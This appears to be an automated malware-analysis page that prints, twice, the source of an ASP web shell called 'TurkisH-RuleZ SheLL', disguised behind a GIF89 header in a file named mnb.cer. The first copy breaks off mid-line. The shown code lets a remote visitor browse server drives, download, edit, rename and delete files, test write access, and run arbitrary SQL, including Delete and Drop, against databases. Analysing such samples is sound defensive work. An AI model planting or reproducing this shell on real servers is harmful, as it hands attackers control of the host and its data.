PHP Malware Analysis
mnb.cer
md5: 7da473dd98764de3476028062fb86965
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Title
- # TurkisH-RuleZ SheLL (Deobfuscated, Original)
Deobfuscated PHP code
GIF89;
<%
'if request("rootx") = "b0x" then
'response.cookies("yes") = "1"
'response.cookies("yes").expires = now+352
'end if
'if not request.cookies("yes") = "1" then
'response.end()
'end if
Server.ScriptTimeOut = 7200
Fullpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
FilePath = mid(Fullpath,InStrRev(Fullpath,"\")+1)
FolderPath = Left(Fullpath,InStrRev(Fullpath,"\"))
const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"
const karakter1="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
const karakter2="abcdefghijklmnopqrstuvwxyz"
const karakter3="0123456789"
const karakter4="!@#$%^&*()-_+=~`[]{}|\:;<>,.?/"
mail_array = array("yahoo","hotmail","mynet","gmail","hacker") '?zel mailler yaratmak i?in, SPAM dan ka??rmak i?in. Securityi a?mak i?in by b0x
uzanti_array = array("com","net","biz","org","gov","br","info")
yasak_array = array("b0x","CYBERWARRIOR","CYBERSECURITY","GAL","GAL","TURK")
Dim b0x
Set b0x = CreateObject("Scripting.FileSystemObject")
Path = Trim(request("Path"))
mode = request("mode")
FolderPath2 = request("FolderPath2")&"\"
islem = request("islem")
del = request("del")
file = request("file")
folder = request("folder")
table = Request("table")
inject1 = Request("inject1")
inject2 = Request("inject2")
inject3 = Request("inject3")
inject4 = Request("inject4")
inject5 = Request("inject5")
cmdkod = Request("cmdkod")
hacked = request("hacked")
Path = request("Path")
url = request("url")
count = request("count")
size = request("size")
dbname = request("dbname")
dbkadi = request("dbkadi")
dbsifre = request("dbsifre")
b0xsql = request("b0xsql")
sec = request("sec")
Usermd5 = request("Usermd5")
ara1 = request("ara1")
ara2 = request("ara2")
k1 = request("k1")
k2 = request("k2")
k3 = request("k3")
k4 = request("k4")
waiting = request("waiting")
coding = request("coding")
dizi = request("dizi")
Usersmd5 = request("Usersmd5")
salt = request("salt")
hash2 = request("hash2")
hash3 = request("hash3")
hash4 = request("hash4")
hash5 = request("hash5")
hash6 = request("hash6")
hash7 = request("hash7")
hash8 = request("hash8")
hash9 = request("hash9")
hash10 = request("hash10")
if Path = "" then
Path = FolderPath
else
FolderPath = Path
end if
if mode = "1" then
FolderPath = request.form("remote")
Path = request.form("remote")
end if
nolist = False
popup = False
if mode = "2" or mode = "3" or mode = "7" or mode = "8" or mode = "16" or mode = "17" or mode = "18" or mode = "19" or mode = "20" or mode = "21" or mode = "22" or mode = "24" or mode = "25" or mode = "26" or mode = "27" or mode = "28" or mode = "29" or mode = "30" or mode = "31" or mode = "32" or mode = "33" or mode = "36" or mode = "38" or mode = "39" or mode = "40" or mode = "41" or mode = "42" or mode = "43" or mode = "44" or mode = "45" or mode = "99" then
popup = True
end if
if mode = "6" then
Response.Buffer=True
Set Fil = b0x.GetFile(file)
Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.end
end if
response.write "<title># TurkisH-RuleZ SheLL </title>"
response.write "<meta http-equiv=""Content-Type"" content=""text/html; charset=iso-8859-9"">"
response.write "<style>"
response.write "body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}"
response.write ".k1{font-family:Wingdings; font-size:15px;}"
response.write ".k2{font-family:Webdings; font-size:15px;}"
response.write "td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}"
response.write "a{color:#EEEEEE;text-decoration:none;}"
response.write "a:hover{color:#40a0ec;}"
response.write "a:visited{color:#EEEEEE;}"
response.write "a:visited:hover{color:#40a0ec;}"
response.write "input,"
response.write ".kbrtm,"
response.write "select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}"
response.write "textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}"
response.write "</style>"
%>
<script language=javascript>
function NewWindow(mypage, myname, w, h, scroll) {
var winl = (screen.width - w) / 2;
var wint = (screen.height - h) / 2;
winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
win = window.open(mypage, myname, winprops)
if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
}
function klasorkopya(yol){
NewWindow(yol,"",400,130,"no");
}
function mass(yol){
NewWindow(yol,"",555,600,"yes");
}
function tester(yol){
NewWindow(yol,"",600,600,"yes");
}
function klasor(yol){
NewWindow(yol,"",420,450,"yes");
}
function cmd(yol){
NewWindow(yol,"",550,555,"no");
}
function biz(yol){
NewWindow(yol,"",550,700,"no");
}
function cmdhelp(yol){
NewWindow(yol,"",500,230,"no");
}
function somur(yol){
NewWindow(yol,"",420,220,"yes");
}
</script>
<script language="JavaScript">
function openInMainWin(winLocation){
window.opener.location.href = winLocation
window.opener.focus();
}
</script>
<%
sub KlasorOku
on error resume next
Set f = b0x.GetFolder(FolderPath)
Set fc = f.SubFolders
For Each f1 In fc
Response.Write "<table class=""kbrtm"" ><tr><td><font class=""k1""><a title="" Move And Copy ?? "" href='"&FilePath&"?mode=2&Path="&FolderPath&"\"&f1.Name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Delete File "" href='"&FilePath&"?mode=4&Path="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>?</a> 1</font><font size=2><b><a title="" Dizinin i?ine Gir "" href='"&FilePath&"?Path="&FolderPath&"\"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b></td></tr></table>"
Response.Flush
Next
call Status
end sub
sub DosyaOku
on error resume next
Set f = b0x.GetFolder(FolderPath)
Set fc = f.Files
For Each f1 In fc
dosyaAdi = f1.name
num = InStrRev(dosyaAdi,".")
uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
downStr = "<a title=""Delete File"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>?</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&f1.path&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Copy/Move File?? "" href='"&FilePath&"?mode=7&file="&f1.path&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Rename File "" href='"&FilePath&"?mode=16&file="&f1.path&"&islem="&f1.name&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
response.Write "<table class=""kbrtm"" ><tr><td><font size=2>"
select case uzanti
case "mdb"
Response.Write "<a title="" Db in i?ini G?rmek , SQl sorgu yapmak i?in T?kla Developed By TurkisH-RuleZ "" href='"&FilePath&"?mode=13&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M "&downStr&"</font></td></tr></table>"
case "asp"
Response.Write "<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>?± <a title="" Edit File "" href='"&FilePath&"?mode=10&file="&f1.path&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
case "jpg","gif"
Response.Write "<a title="" Resmi G?rmek i?in T?kla "" href='"&FilePath&"?mode=12&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>?¢</font><font face=wingdings size=4> "&downStr&"</font></td></tr></table>"
case else
Response.Write "<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a title="" Edit File "" href='"&dosyaPath&"?mode=10&file="&f1.path&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
end select
Next
call Status
end sub
sub Suruculer
for each drive_ in b0x.Drives
Response.Write "<tr bgcolor=""#3a3a3a""><td height=""20"" class=""kbrtm"">"
Response.Write "<a href="" "&FilePath&"?Path="&drive_.DriveLetter&":/ "">"
if drive_.Drivetype=1 then Response.write " <font class=""k1""><</font> Disk Drive [" & drive_.DriveLetter & ":] <a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
if drive_.Drivetype=2 then Response.write " <font class=""k1"">;</font> Disk Drive [" & drive_.DriveLetter & ":] <a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
if drive_.Drivetype=3 then Response.write " <font class=""k1"">;</font> C?kar?labilir Disk [" & drive_.DriveLetter & ":] <a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
if drive_.Drivetype=4 then Response.write " <font class=""k2"">?³</font> Cd-Rom [" & drive_.DriveLetter & ":] <a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
Response.Write "</a></td></tr>"
next
Response.Write "<tr bgcolor=""#3a3a3a""><td class=""kbrtm"" height=""20""> <a href="" "&FilePath&" ""><font class=""k2"">H</font> Local Path </a></td></tr>"
end sub
Sub SurucuInfo
'Disk Alan?n? G?sterir - Coded Developed By TurkisH-RuleZ
DriveSpace = Request("dspace")
If Not DriveSpace = "" Then
on error resume next
Set driveObject = b0x.GetDrive(DriveSpace)
D1 = Left((driveObject.FreeSpace/(driveObject.TotalSize*1.0))*100.0, 4)
if err <> 0 then
response.write "<center><br> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Disk Haz?r de?il !!!! :( <font face=Wingdings size=5>N</font></font> <br></center>"
else
D2 = Left(((driveObject.TotalSize - driveObject.FreeSpace)/(driveObject.TotalSize*1.0))*100.0, 4)
D3 = 100
D1a = 110 - D1
D2a = 110 - D2
D3a = 110 - D3
Response.Write "<br><center><table cellspacing=0 cellpadding=0><tr><td style='background-color: #121212;' colspan=4 align=center class=kbrtm><b>Disk :</b> " & driveObject.DriveLetter & "</td></tr><tr><td class=kbrtm width=60> </td><td class=kbrtm width=100 align=center><b>Bo? Alan</b></td><td class=kbrtm width=100 align=center><b>Kullan?lan Alan</b></td><td class=kbrtm width=100 align=center><b>Toplam Alan</b></td></tr><tr><td height=110 class=kbrtm> </td><td class=kbrtm align=center><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D1a&"></td></tr><tr height="&D1&"><td bgcolor=#009900 width=2></td><td bgcolor=#33CC00 width=15></td><td bgcolor=#009900 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D2a&"></td></tr><tr height="&D2&"><td bgcolor=#990000 width=2></td><td bgcolor=#CC0000 width=15></td><td bgcolor=#990000 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D3a&"></td></tr><tr height="&D3&"><td bgcolor=#006699 width=2></td><td bgcolor=#0088CC width=15></td><td bgcolor=#006699 width=2></td></tr></table></td></tr><tr><td class=kbrtm> <b>Y?zde :</b></td><td class=kbrtm align=center>"&D1&" %</td><td class=kbrtm align=center>"&D2&" %</td><td class=kbrtm align=center>"&D3&" %</td></tr><tr><td class=kbrtm> <b>Boyut :</b></td><td class=kbrtm align=center> " & FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center> " & FormatNumber(driveObject.TotalSize / 1048576) - FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center> " & FormatNumber(driveObject.TotalSize / 1048576) & " MB</td></tr></table></center><br><br><br>"
end if
Set driveObject = Nothing
End If
end sub
sub yetkino(str)
response.write "<td class=""kbrtm""> <b><font color=#FBE1D7>"&str&" :</font></b> <font color=#FE7A84 class=""k1"">?</font> </td>"
End Sub
sub yetkiyes(str)
response.write "<td class=""kbrtm""> <b><font color=#FAFEDE>"&str&" :</font></b> <font color=#C6FCBE class=""k1"">?</font> </td>"
end Sub
sub Yetki
on error resume next
Set f = b0x.GetFolder(FolderPath)
if err<>0 then
yetkino("Reading ")
yetkino("Writing ")
yetkino("Deleting ")
else
yetkiyes("Reading ")
on error resume next
Set MyFile = b0x.CreateTextFile(FolderPath & "test.b0x", True)
MyFile.write "b0x Was Here... =) Writing - Reading Testi i?in"
set MyFile = Nothing
if err<>0 then
yetkino("Writing ")
yetkino("Deleting ")
else
yetkiyes("Writing ")
on error resume next
b0x.DeleteFile FolderPath & "test.b0x",true
if err<>0 then
yetkino("Deleting ")
else
yetkiyes("Deleting ")
end if
end if
end if
set f = nothing
end sub
Sub olmadi(str)
response.write "<br><center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&str&" :( <font face=Wingdings size=5>N</font> </font></center>"
End Sub
Sub oldu(str)
response.write "<br><center><font color=#C6FCBE> <font face=Wingdings size=5>N</font> "&str&" ;) Tebrikler ??lem Ba?ar?yla Ger?ekle?tirildi.. by b0x <font face=Wingdings size=5>N</font> </font></center>"
End Sub
Sub tablo12(str)
response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo30(str)
response.write "<tr bgcolor=""#303030""><td class=""kbrtm"" align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo12L(str)
response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo12O(str)
response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
sub Status
if err<>0 then
Response.Write "<center><font color=red size=2>Status : "&err.Description&"</font></center>"
end if
end sub
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function
Sub SQL_menu_by_b0x
response.write "<center><table width=""450"">"
response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"
response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
tablo30(" <b>SQL ?njection Merkezi</b>")
tablo30(" ")
tablo12("<font color=#FE7A84> Kullanabilmeniz i?in SQL kou?tlar? bilmeniz gerek !!! <br> <font face=Wingdings size=5>N</font> Aksi Halde ASP DOsya? Kitlenir. Cevap veremez. Server a Zarar verir. <font face=Wingdings size=5>N</font></font>")
tablo12(" Select <input value=""select"" type=""radio"" name=""islem"" checked> <input size=""60"" type=""text"" name=""inject1"" value='Select * from "&table&"'>")
tablo12(" Delete <input value=""delete"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject2"" value='Delete from "&table&"'>")
tablo12(" Insert <input value=""insert"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject3"" value='Insert into "&table&" () values ()'>")
tablo12(" Update <input value=""update"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject4"" value='Update "&table&" set .. where ..'>")
tablo12(" Di?er <input value=""diger"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject5"" value='Drop "&table&"'>")
tablo12("<input name=""mode"" type=""hidden"" value='15' ><input name=""sec"" type=""hidden"" value='"&sec&"' ><input name=""b0xsql"" type=""hidden"" value='"&b0xsql&"' ><input name=""file"" type=""hidden"" value='"&file&"' ><input name=""Path"" type=""hidden"" value='"&FolderPath&"' ><input name=""table"" type=""hidden"" value='"&table&"' ><br><input value="" SQL ?nj. Uygula "" type=""Submit""><br><br>")
if b0xsql = "" then
tablo12("<a href='"&FilePath&"?mode=13&file="&file&"&Path="&FolderPath&"&Time="&time&"'> .... ::: Tablolara Geri D?n ::: .... </a><br>")
else
tablo12("<a href='"&FilePath&"?mode=34&file="&file&"&Path="&Path&"&b0xsql="&b0xsql&"&islem=1&Time="&time&"'> .... ::: Tablolara Geri D?n ::: .... </a><br>")
end if
response.write "</form></table></td></tr></table><br></center>"
response.write "<table align=""center"" class=""kbrtm""><tr><td align='center'> <a href='"&FilePath&"?mode=36&Path="&Path&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>...:::::: SQL Komut Yard?m - Kullan?m Klavuzu by b0x ::::::...</b></a> </td></tr></table><br>"
end sub
Sub SQL_by_b0x(sqlPath,sqlkomut)
on error resume next
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = sqlPath
objConn.Open
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Ba?lant?n?z Sa?lanamad? !!! by b0x :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
on error resume next
objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL ?njection Komutunuzda Status var. ( Bilmiyorsan KullanMA :) ) by b0x <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td><font color=black><b> "&objRcs.Fields(i).Name&" </font></td>"
next
Response.Write "</tr>"
do while not objRcs.EOF
Response.Write "<tr class=""kbrtm"">"
for i=0 to objRcs.Fields.count-1
Response.Write "<td class=""kbrtm"">"&Replace(objRcs.Fields(i).Value,"<","<")&" </td>"
next
Response.Write "</tr>"
objRcs.MoveNext
loop
Response.Write "</table><br></center>"
end if
end if
end sub
Sub MSSQL_by_b0x(sqlPath,sqlkomut)
on error resume next
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Open sqlPath
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Ba?lant?n?z Sa?lanamad?? !!! by b0x :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </fontExecution traces
Generated HTML code
<html><head></head><body></body></html>Original PHP code
GIF89;
<%
'if request("rootx") = "b0x" then
'response.cookies("yes") = "1"
'response.cookies("yes").expires = now+352
'end if
'if not request.cookies("yes") = "1" then
'response.end()
'end if
Server.ScriptTimeOut = 7200
Fullpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
FilePath = mid(Fullpath,InStrRev(Fullpath,"\")+1)
FolderPath = Left(Fullpath,InStrRev(Fullpath,"\"))
const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"
const karakter1="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
const karakter2="abcdefghijklmnopqrstuvwxyz"
const karakter3="0123456789"
const karakter4="!@#$%^&*()-_+=~`[]{}|\:;<>,.?/"
mail_array = array("yahoo","hotmail","mynet","gmail","hacker") '?zel mailler yaratmak i?in, SPAM dan ka??rmak i?in. Securityi a?mak i?in by b0x
uzanti_array = array("com","net","biz","org","gov","br","info")
yasak_array = array("b0x","CYBERWARRIOR","CYBERSECURITY","GAL","GAL","TURK")
Dim b0x
Set b0x = CreateObject("Scripting.FileSystemObject")
Path = Trim(request("Path"))
mode = request("mode")
FolderPath2 = request("FolderPath2")&"\"
islem = request("islem")
del = request("del")
file = request("file")
folder = request("folder")
table = Request("table")
inject1 = Request("inject1")
inject2 = Request("inject2")
inject3 = Request("inject3")
inject4 = Request("inject4")
inject5 = Request("inject5")
cmdkod = Request("cmdkod")
hacked = request("hacked")
Path = request("Path")
url = request("url")
count = request("count")
size = request("size")
dbname = request("dbname")
dbkadi = request("dbkadi")
dbsifre = request("dbsifre")
b0xsql = request("b0xsql")
sec = request("sec")
Usermd5 = request("Usermd5")
ara1 = request("ara1")
ara2 = request("ara2")
k1 = request("k1")
k2 = request("k2")
k3 = request("k3")
k4 = request("k4")
waiting = request("waiting")
coding = request("coding")
dizi = request("dizi")
Usersmd5 = request("Usersmd5")
salt = request("salt")
hash2 = request("hash2")
hash3 = request("hash3")
hash4 = request("hash4")
hash5 = request("hash5")
hash6 = request("hash6")
hash7 = request("hash7")
hash8 = request("hash8")
hash9 = request("hash9")
hash10 = request("hash10")
if Path = "" then
Path = FolderPath
else
FolderPath = Path
end if
if mode = "1" then
FolderPath = request.form("remote")
Path = request.form("remote")
end if
nolist = False
popup = False
if mode = "2" or mode = "3" or mode = "7" or mode = "8" or mode = "16" or mode = "17" or mode = "18" or mode = "19" or mode = "20" or mode = "21" or mode = "22" or mode = "24" or mode = "25" or mode = "26" or mode = "27" or mode = "28" or mode = "29" or mode = "30" or mode = "31" or mode = "32" or mode = "33" or mode = "36" or mode = "38" or mode = "39" or mode = "40" or mode = "41" or mode = "42" or mode = "43" or mode = "44" or mode = "45" or mode = "99" then
popup = True
end if
if mode = "6" then
Response.Buffer=True
Set Fil = b0x.GetFile(file)
Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.end
end if
response.write "<title># TurkisH-RuleZ SheLL </title>"
response.write "<meta http-equiv=""Content-Type"" content=""text/html; charset=iso-8859-9"">"
response.write "<style>"
response.write "body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}"
response.write ".k1{font-family:Wingdings; font-size:15px;}"
response.write ".k2{font-family:Webdings; font-size:15px;}"
response.write "td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}"
response.write "a{color:#EEEEEE;text-decoration:none;}"
response.write "a:hover{color:#40a0ec;}"
response.write "a:visited{color:#EEEEEE;}"
response.write "a:visited:hover{color:#40a0ec;}"
response.write "input,"
response.write ".kbrtm,"
response.write "select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}"
response.write "textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}"
response.write "</style>"
%>
<script language=javascript>
function NewWindow(mypage, myname, w, h, scroll) {
var winl = (screen.width - w) / 2;
var wint = (screen.height - h) / 2;
winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
win = window.open(mypage, myname, winprops)
if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
}
function klasorkopya(yol){
NewWindow(yol,"",400,130,"no");
}
function mass(yol){
NewWindow(yol,"",555,600,"yes");
}
function tester(yol){
NewWindow(yol,"",600,600,"yes");
}
function klasor(yol){
NewWindow(yol,"",420,450,"yes");
}
function cmd(yol){
NewWindow(yol,"",550,555,"no");
}
function biz(yol){
NewWindow(yol,"",550,700,"no");
}
function cmdhelp(yol){
NewWindow(yol,"",500,230,"no");
}
function somur(yol){
NewWindow(yol,"",420,220,"yes");
}
</script>
<script language="JavaScript">
function openInMainWin(winLocation){
window.opener.location.href = winLocation
window.opener.focus();
}
</script>
<%
sub KlasorOku
on error resume next
Set f = b0x.GetFolder(FolderPath)
Set fc = f.SubFolders
For Each f1 In fc
Response.Write "<table class=""kbrtm"" ><tr><td><font class=""k1""><a title="" Move And Copy ?? "" href='"&FilePath&"?mode=2&Path="&FolderPath&"\"&f1.Name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Delete File "" href='"&FilePath&"?mode=4&Path="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>?</a> 1</font><font size=2><b><a title="" Dizinin i?ine Gir "" href='"&FilePath&"?Path="&FolderPath&"\"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b></td></tr></table>"
Response.Flush
Next
call Status
end sub
sub DosyaOku
on error resume next
Set f = b0x.GetFolder(FolderPath)
Set fc = f.Files
For Each f1 In fc
dosyaAdi = f1.name
num = InStrRev(dosyaAdi,".")
uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
downStr = "<a title=""Delete File"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>?</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&f1.path&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Copy/Move File?? "" href='"&FilePath&"?mode=7&file="&f1.path&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Rename File "" href='"&FilePath&"?mode=16&file="&f1.path&"&islem="&f1.name&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
response.Write "<table class=""kbrtm"" ><tr><td><font size=2>"
select case uzanti
case "mdb"
Response.Write "<a title="" Db in i?ini G?rmek , SQl sorgu yapmak i?in T?kla Developed By TurkisH-RuleZ "" href='"&FilePath&"?mode=13&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M "&downStr&"</font></td></tr></table>"
case "asp"
Response.Write "<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>?± <a title="" Edit File "" href='"&FilePath&"?mode=10&file="&f1.path&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
case "jpg","gif"
Response.Write "<a title="" Resmi G?rmek i?in T?kla "" href='"&FilePath&"?mode=12&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>?¢</font><font face=wingdings size=4> "&downStr&"</font></td></tr></table>"
case else
Response.Write "<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&Path="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a title="" Edit File "" href='"&dosyaPath&"?mode=10&file="&f1.path&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
end select
Next
call Status
end sub
sub Suruculer
for each drive_ in b0x.Drives
Response.Write "<tr bgcolor=""#3a3a3a""><td height=""20"" class=""kbrtm"">"
Response.Write "<a href="" "&FilePath&"?Path="&drive_.DriveLetter&":/ "">"
if drive_.Drivetype=1 then Response.write " <font class=""k1""><</font> Disk Drive [" & drive_.DriveLetter & ":] <a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
if drive_.Drivetype=2 then Response.write " <font class=""k1"">;</font> Disk Drive [" & drive_.DriveLetter & ":] <a title=""S?r?c? Detay? ??in T?kla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&Path="&Path&"""><font class=""k1"">?</font></a>"
